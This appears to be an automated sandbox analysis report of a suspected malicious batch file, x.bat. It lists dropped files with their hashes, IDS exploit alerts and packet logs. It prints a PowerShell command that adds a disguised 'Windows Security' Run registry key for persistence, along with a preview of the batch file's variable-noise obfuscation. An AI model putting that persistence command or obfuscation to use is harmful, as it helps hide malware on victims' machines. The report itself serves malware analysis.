                                                                                                                                                                                                            SHA1:AF1877B0E8B4FDE602313AE1AC5351602EAE8ED9
                                                                                                                                                                                                            SHA-256:8FF6787444BF6E6D9FDF03D8D6FC87F206F925D719ED430D25D748D0A3102246
                                                                                                                                                                                                            SHA-512:9B41D5795287BCCBB55CE6D8C48EB88D9865AEEA8871158DCFC27609479B08D429DC400C9E59CD94D8D20B19F2DEE9D8F681CAABA012F2DF571D47697814F4B4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d/........................@...s....d.Z.d.d.l.T.d.d...Z.d.S.).u.....The sqlite3 extension module provides a DB-API 2.0 (PEP 249) compliant.interface to the SQLite library, and requires SQLite 3.7.15 or newer...To use the module, start by creating a database Connection object:.. import sqlite3. cx = sqlite3.connect("test.db") # test.db will be created or opened..The special path name ":memory:" can be provided to connect to a transient.in-memory database:.. cx = sqlite3.connect(":memory:") # connect to a database in RAM..Once a connection has been established, create a Cursor object and call.its execute() method to perform SQL queries:.. cu = cx.cursor().. # create a table. cu.execute("create table lang(name, first_appeared)").. # insert values into a table. cu.execute("insert into lang values (?, ?)", ("C", 1972)).. # execute a query and iterate over the result. for row in cu.execute("select * from lang"):. print(row).. cx.close()..Th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2998
                                                                                                                                                                                                            Entropy (8bit):5.134258664791826
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ly2fEkeTde1j7eBB/KP+7oheXYPX7sV2PXSedPuPXRGqPz0DOPXuPXDFePXd/UTJ:lf8Tdq3gB/6+7oheXYv7sV2vSeRuvRFg
                                                                                                                                                                                                            MD5:C4781086C25F0A3A10D2AAC082E69F9E
                                                                                                                                                                                                            SHA1:3A5870D08E7EF05E17C8E9AC3ADD0D8F98962E04
                                                                                                                                                                                                            SHA-256:E1E99996CA36389D77004DE820BF561E36CED29D41799BED294C0EE60FB06290
                                                                                                                                                                                                            SHA-512:6522E316561A1244D42170DB4454171709739BA531C268FBAE3E420E2B37ADBB00BC13E26F6F20E37BA259062D6C5EE7CF18C1AF5BFC2E746987AEEEDF85AC23
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,db........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.Z.d.Z.d.Z.e.j.Z.e.j.Z.e.j.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d...e...d...D.....Z.e.d.d...e...d...D.....Z.e.Z.e.j.j...e.....d.d...Z.e.....d.d...Z.[.d.S.)......N)...*Z.qmark.....z.2.0c....................C........t.t...|...d.d.......S.).N.....)...Date..time..localtime..Z.ticks..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\sqlite3\dbapi2.py..DateFromTicks)..........r....c....................C...s....t.t...|...d.d.......S.).Nr.........)...Timer....r....r....r....r....r......TimeFromTicks,...r....r....c....................C...r....).Nr....)...Timestampr....r....r....r....r....r......TimestampFromTicks/...r....r....c....................C........g.|.].}.t.|.....q.S.r........int.....0..xr....r....r......<listcomp>2..........r.......c....................C...r....r....r....r....r....r....r....r....3...r....c....................C...sP...d.d...}.d.d...}.d.d...}.d.d...}.t.t.j.|.....t.t.j.|.....t.d.|.....t.d.|.....d.S.)
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                            Entropy (8bit):4.465277654890252
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/lYKlluleh/wZWeCR8ut+kiE2J5dj/a88ZqOkcTgp:y/CK/qeh/w2muwkn23h/aLAu4
                                                                                                                                                                                                            MD5:FEB3BD9C059EFF4927FE6214F44D002D
                                                                                                                                                                                                            SHA1:BAC13E02D6CF303367357287B2FDD111EFA45C2A
                                                                                                                                                                                                            SHA-256:A09496AFFB0570FA6A9DF3B3334A17B4524AF0862F5D9CE53349635BF8194776
                                                                                                                                                                                                            SHA-512:34E0B652BA38E1E863AF97BCB29618A77A8C806B7C0888BA68AE2DEBA475029F311C6EC0C141093C260849E136118457BFEE63456C907B764AAEC1A5AB59188C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.S.).N..r....r....r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\urllib\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2877
                                                                                                                                                                                                            Entropy (8bit):4.915868059873033
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lqSbuQshuDSkJ8eJ/XmiWqgpHO26ZenDxp/mdveDI8JG/UOUPkjKbMrHoYwqmAMk:pbuyDSkJ8eJ/WmgpHF/DxwdveDI84/Ue
                                                                                                                                                                                                            MD5:9216A54E54DC24F1D591FD215654951C
                                                                                                                                                                                                            SHA1:F4B3CFFDF90617D422E768907A70E1330B86F30E
                                                                                                                                                                                                            SHA-256:673EE934C9946F8BCF7A3316DEC5ABB507807C6E3B8186331576D146CA51274F
                                                                                                                                                                                                            SHA-512:3B11407B175683A1EC668BE42512C57FBA902D286A2BDAD66410A05D3F2DE97FCB277EF19681FA0187DBE9EA7FD9256911A27A26A39EE01BF08C8D0A6D3406D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sV...d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e.j.j...Z.G.d.d...d.e...Z.d.S.).a....Exception classes raised by urllib...The base exception class is URLError, which inherits from OSError. It.doesn't define any behavior of its own, but is the base class for all.exceptions defined in this package...HTTPError is an exception class that is also a valid HTTP response.instance. It behaves this way because HTTP protocol errors are valid.responses, with a status code, headers, and a body. In some contexts,.an application may want to handle an exception like a regular.response.......N)...URLError..HTTPError..ContentTooShortErrorc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s$...|.f.|._.|.|._.|.d.u.r.|.|._.d.S.d.S...N)...args..reason..filename)...selfr....r......r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\urllib\error.py..__init__....s..............z.URLError.__init__c.................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33800
                                                                                                                                                                                                            Entropy (8bit):5.440654581044471
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:PGx1qI5qcr97to4zfJA/G4B3qrmuZv0saN7erPd:+xNFSUCd7uZv0saN7er1
                                                                                                                                                                                                            MD5:D8706D0F895598BAF486A123253038BE
                                                                                                                                                                                                            SHA1:6A828A5998A56DF4E721B8F7E5D1F7B8C564D878
                                                                                                                                                                                                            SHA-256:D706717CFD8BF955F90C16EDC2A6918B233C34A89F27B0D3CEBF31E64A3F4248
                                                                                                                                                                                                            SHA-512:BC9A25F5EE2E66C952BA8A172AC1E770A22A2B06635E9031FF486F484F24B47BB2402D319C1A3CC4A998D2F04FB24372E6DA55446145D73CB295057954418E31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.d.Z.g.d...Z.d.Z.i.Z.d.d...Z.d.Z.d.Z.d.d...Z.e.e.f.d.d...Z.e.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.d.d#l.m.Z...e.d$d%..Z.e.d&d'..Z e.d(d)..Z!d*e._.d+e.j"_.d,e.j#_.d-e _.d.e j$_.d/e j%_.d0e j&_.d1e j'_.d2e j#_.d3e!_.e j$j.e!j$_.e j%j.e!j%_.e j&j.e!j&_.d4e!j(_.e j'j.e!j'_.e j#j.e!j#_.e.Z)G.d5d$..d$e.e...Z*G.d6d&..d&e e...Z+G.d7d(..d(e!e...Z,G.d8d9..d9e.e...Z-G.d:d;..d;e e...Z.G.d<d=..d=e!e...Z/d>d?..Z0e0....[0d.dBdC..Z1dDdE..Z2d.dFdG..Z3dHdI..Z4d.dJdK..Z5dLdM..Z6dNdO..Z7d.dPdQ..Z8dRdS..Z9dTZ:d.a;dUdV..Z<e..=dW..Z>d.dZd[..Z?.\.]d.d^d_..Z@.\.]d.d`da..ZAd.dbdc..ZBeCdd..ZDeEeD..ZFi.ZGG.dedf..dfe.jH..ZId.dhdi..ZJd.djdk..ZKd.dldm..ZLd\d@d.d.eKf.dndo..ZMdpdq..ZNdrds..ZOdtdu..ZPdvdw..ZQd.aRdxdy..ZSdzd{..ZTd.aUd|d}..ZVd~d...ZWd.d...ZXd.d...ZYd.d...ZZd.d...Z[d.a\d.d...Z]d.d.d...Z^d.d.d...Z_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):71362
                                                                                                                                                                                                            Entropy (8bit):5.431941705551869
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:fZcvBft5NLO4/8f5pda8QPz3lelAqIu/PeI4f3G6IKoi1xDFY2B:fWtt5U4UhpdIPzuHV6FHxjB
                                                                                                                                                                                                            MD5:B8EE3D8327BA05772B691B43C2F71172
                                                                                                                                                                                                            SHA1:EE2076BB6A1004B67F2B7C4C5F82DFDB5308993A
                                                                                                                                                                                                            SHA-256:550938BB2B88A6CE0D7AD1E34D47AAFF226B3242842FF85CA8DA30C71942A2A8
                                                                                                                                                                                                            SHA-512:D96EBE6314BE97FBB304CC31E2849EA02578B256AF6E40F6F4ABD0E01F604B42F690382176E35391ABE3696F0737C1E8D9938151D884D584B5972758CBA73160
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3491
                                                                                                                                                                                                            Entropy (8bit):4.755357860013178
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:1BaL9CzkpnMBDq/vnacKhRVH+nRsxv5C+8/15dzjT:CxunNq33ERVHNvCl/9T
                                                                                                                                                                                                            MD5:F41D5C39C1E32ADEE8724F68E395A0A1
                                                                                                                                                                                                            SHA1:10DC9642BCE1C9A62579DE0CB62E2E21FEFFBA57
                                                                                                                                                                                                            SHA-256:6E45D2089310D7E879AD7FB71B93BD56AC5897EDDB0CCEAB07F0729DB85F345D
                                                                                                                                                                                                            SHA-512:C2F9D4F013E259AAF3071BEF11189D1C453C8D5B667044BDCFC6E404E1E1C35C4C5C9F847074CD1E39F435B62E3EA1F4EEAC913F324D96405B42C91AA88F2ED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sZ...d.Z.d.d.l.Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a....Response classes used by urllib...The base class, addbase, defines a minimal file-like interface,.including read() and readline(). The typical response object is an.addinfourl instance, which defines an info() method that returns.headers and a geturl() method that returns the url.......N)...addbase..addclosehook..addinfo..addinfourlc........................s8...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.).r....zOBase class for addinfo and addclosehook. Is a good idea for garbage collection.c........................s ...t.t.|...j.|.d.d.d.....|.|._.d.S.).Nz.<urllib response>F)...delete)...superr......__init__..fp)...selfr........__class__...>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\urllib\response.pyr........s........z.addbase.__init__c....................C...s....d.|.j.j.t.|...|.j.f...S.).Nz.<%s at %r whose fp = %r>).r......__nam
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:1
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5180)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):5185
                                                                                                                                                                                                            Entropy (8bit):5.831594776102439
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:VoialijwxeZV7/QlpePZ1LKRR2sPOK67kfqZKQ9nSR256Z6sYgIGW9zIffQffL:Wio2wxeZhf1WRomOKy3ZKQ9nvC6TgI7/
                                                                                                                                                                                                            MD5:2091AAD8548C1943857514335B4F6AB2
                                                                                                                                                                                                            SHA1:EAD6DB0F595711EFA2BE6583B28A42F973A29B8F
                                                                                                                                                                                                            SHA-256:7F34EA826C42B0E190C7C727BE0EB1AAA10658581A251CA7F1E59E52A81AD987
                                                                                                                                                                                                            SHA-512:C0C5BCCE7464377DD25EF82BA8B598B7B0999DCD285EA67BB8FAD9C50DA24628C1C9448443C46ED8C69FDF4C9993A399ECD5E77D66BC5A2B6AA590DE0006D96B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                            Preview:)]}'.["",["mattel wicked dolls","amd ryzen 9800x3d","family dollar stores closing","pittsburgh steelers","aurora borealis northern lights forecast","saudi arabian desert snowfall","bridget user diary trailer","cod warzone black ops 6"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNXRmbRINRm9vdGJhbGwgdGVhbTKeEGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFCQUNBTUFBQUNkdDRIc0FBQUE1MUJNVkVYLy8vK2xySzhBVTV2dXJSN0dERENxc2JTaXFhd0FBQUNkcGFpdHRMZjcrL3RkWW1UdHBnRHRxQUQyOXZieTh2THM3T3g3Z1lTcnFxcTZ2OEdLa0pQQkFBQUFRSk5nWDE4NlBUNkdoWVZQVTFYSXlNaUJoNHJMejlIazV1ZnZ0VUhYMnR0NWVYbEdTa3dBU3BlNnVia3dNelQ5OWVyMXo1TDc3ZGo0NGIzdnNUTERBQjNtcnJQc3c4YkZBQ2p1eTg3Q0FCTFozK3ByYTJyNjU4djMycXp6eUgzeXczRHh1bGFabUpqMjFKNzE0ZVB4dm1MV2NYdkhIRGpjakpUTlJsY2lJaUxMTjByaG02TFRZMjYzdzluSDBlR05vOFUrYTZkamc3UFpmb2NvWD
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                            Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                            MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                            SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                            SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                            SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                            Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):133058
                                                                                                                                                                                                            Entropy (8bit):5.435066283682355
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:frkPdsBJT7bKwkztS6STFSz1nrmPSnXYK02i6o:fEdUW5c5Sz1nKPSnoK08o
                                                                                                                                                                                                            MD5:CFB0D62D6E962595FF6900FDBC2ED63E
                                                                                                                                                                                                            SHA1:26FAC019C16CECF7B0826D67DBB012977EC010C4
                                                                                                                                                                                                            SHA-256:FAE0C64AF79C3048CE748CD8B9310BB1D70582FF86DC909FEFDAF99798586865
                                                                                                                                                                                                            SHA-512:F7AF735E398B1B868D9D18BF9DDBF5C488B6A6DF6D127D497E7326A3714EC2EDAE6529F9A57A73D378491B4C702842A3E6B15BDE700DB0394364E45B35C5E49E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                            Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):214
                                                                                                                                                                                                            Entropy (8bit):5.113215474537009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:s+qoZH1jMhLBKJd8Lfz9S/cuOwkn23yMAtGtv:s+q+VjMd2dafzIcuJfotGtv
                                                                                                                                                                                                            MD5:DDD5A726AC75DA20320C86CFDFB0C207
                                                                                                                                                                                                            SHA1:FD3DC361B66FA56116F8F08CC01C368FA75EF865
                                                                                                                                                                                                            SHA-256:E8C1A3645E43ACD3F4FC1D849A4635113ABBFBC466847A2485AC99099DF1F4C1
                                                                                                                                                                                                            SHA-512:1F15D4B87B26613C6F12B912799CE3923CE173E359AC9F09E6A01A33964FF6AD4F75F936CD07E89554AA96A48C68BC4B1287F7B0945E755F1D81DE4535EB18AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ..
                                                                                                                                                                                                            Process:C:\Windows\System32\chcp.com
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25
                                                                                                                                                                                                            Entropy (8bit):4.103465189601646
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PHsEiV/:PsES
                                                                                                                                                                                                            MD5:D38306034A39FBDFDAC172946D5EF53F
                                                                                                                                                                                                            SHA1:346E6FF4E144749719368D4A27675C44E742BDCF
                                                                                                                                                                                                            SHA-256:2B06CDF30ADE079C57F6E8EC16FA27563855265463BEDE417A2DD63A631B6A21
                                                                                                                                                                                                            SHA-512:7F3CFF34DB2E1528BA3928E3C41CEC4C6407DFAB4CD57FA298CCD06AA65696FB3321DFCC24A0BF5A7D546F1216E3506F1D26B09B11E5511AD33219913FA149D4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:Active code page: 65001..
                                                                                                                                                                                                            File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                                                                                                                                                                                            Entropy (8bit):5.554877415113663
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                                                                                                                                                                                                            • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                                                                                                                                                                                                            • MP3 audio (1001/1) 18.19%
                                                                                                                                                                                                            File name:x.bat
                                                                                                                                                                                                            File size:247'311 bytes
                                                                                                                                                                                                            MD5:d3e16c25b182396111f5878854aff8af
                                                                                                                                                                                                            SHA1:203d0e3ea2b0872accc64829a973647d3fc49a62
                                                                                                                                                                                                            SHA256:cc1695a2e481381f8e5d8a5bedc46e3e9c02f5644251a887898036408dc9bcbe
                                                                                                                                                                                                            SHA512:7ef959f1514d562ea1e832eb7ad4c60174400e28917656a855570b479f491092b7b84ba05d50c2ecc70afce1642c2fcf1e00727ebc35c43a58e129f6f7ed1353
                                                                                                                                                                                                            SSDEEP:6144:1ImsCVUZV2Nr6LgY+00yZQoi0gD3hb2N1:VVUT2pSxzgD3h8
                                                                                                                                                                                                            TLSH:4E34D013421D5E3F73AA63AD04B91A0F6DC44EC340B21FDCF96C6A8A774E9072BE5199
                                                                                                                                                                                                            File Content Preview:..%SLmQyiK%>%JUzRcXS%%htYiRfG%n%nTfaYjTY%%dyiweiTSt%u%VKCWtegoO%%tGqdezh%l%MwihSuN% %TFebopdj%2%OYVejTAA%%oORpWvbb%>%acMTHSVZ%%zGpmuMAKr%&%OmwxBPk%%ZfsmWhSq%1%VRoxDUp% %MuaeHiQu%&%TZQjTwYlu%%kHFdNVAB%&%zadapaaC% %ZiDuvRLlm%e%KYXCZZu%%nHNMKgG%x%EhMVZDW%%fj
                                                                                                                                                                                                            Icon Hash:9686878b929a9886
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-13T13:25:22.146626+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449736TCP
                                                                                                                                                                                                            2024-11-13T13:25:25.375630+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass142.96.10.880192.168.2.449733TCP
                                                                                                                                                                                                            2024-11-13T13:26:00.388160+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449742TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 13, 2024 13:25:14.425457954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:14.430525064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:14.431189060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:14.431236982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:14.436157942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446592093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446655989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446692944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446708918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446727037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446764946 CET804973342.96.10.8192.168.2.4
